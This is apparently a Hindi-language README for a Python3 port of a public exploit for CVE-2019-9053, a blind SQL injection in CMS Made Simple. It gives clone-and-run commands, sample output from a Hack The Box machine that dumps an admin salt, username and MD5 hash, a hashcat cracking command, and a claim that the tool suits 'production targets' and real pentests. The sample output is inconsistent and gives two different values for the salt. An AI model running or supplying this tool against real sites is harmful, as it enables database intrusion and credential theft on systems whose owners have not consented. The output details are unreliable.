
Python3 एक्स्प्लॉइट CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi) के लिए। कोई डिपेंडेंसी नहीं, टाइम-बेस्ड ब्लाइंड SQLi → एडमिन क्रेडेंशियल्स डंप। HTB राइटअप ओन्ड।
मूल Exploit-DB #46635 (Daniele Scanu द्वारा) का शुद्ध Python3 पोर्ट। समय-आधारित ब्लाइंड SQLi के माध्यम से कमजोर CMS Made Simple इंस्टॉलेशन से एडमिन क्रेडेंशियल्स डंप करना।
✅ कोई बाहरी निर्भरता नहीं (केवल requests)
✅ Python 3.6+ मूल (f-strings, walrus operator)
✅ सुंदर रंगीन आउटपुट (ANSI)
✅ स्थिर और तेज़ (~3-5 मिनट डंप औसत कनेक्शन पर)
✅ प्रोडक्शन लक्ष्यों के लिए टाइमआउट/एरर हैंडलिंग
✅ हैशकैट-तैयार आउटपुट (salt + MD5 फॉर्मेट)
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Sleep time (slower = more stable)
timeout = 20 # Request timeout
chars = '...' # Custom charset
मूल लेखक: Daniele Scanu
Exploit-DB: #46635
Python3 पोर्ट और सुधार: Tim Karov
MIT लाइसेंस - LICENSE देखें
⭐ उपयोगी लगे तो स्टार करें! HTB/TryHackMe लैब्स और वास्तविक पेनटेस्ट में उपयोग किया गया।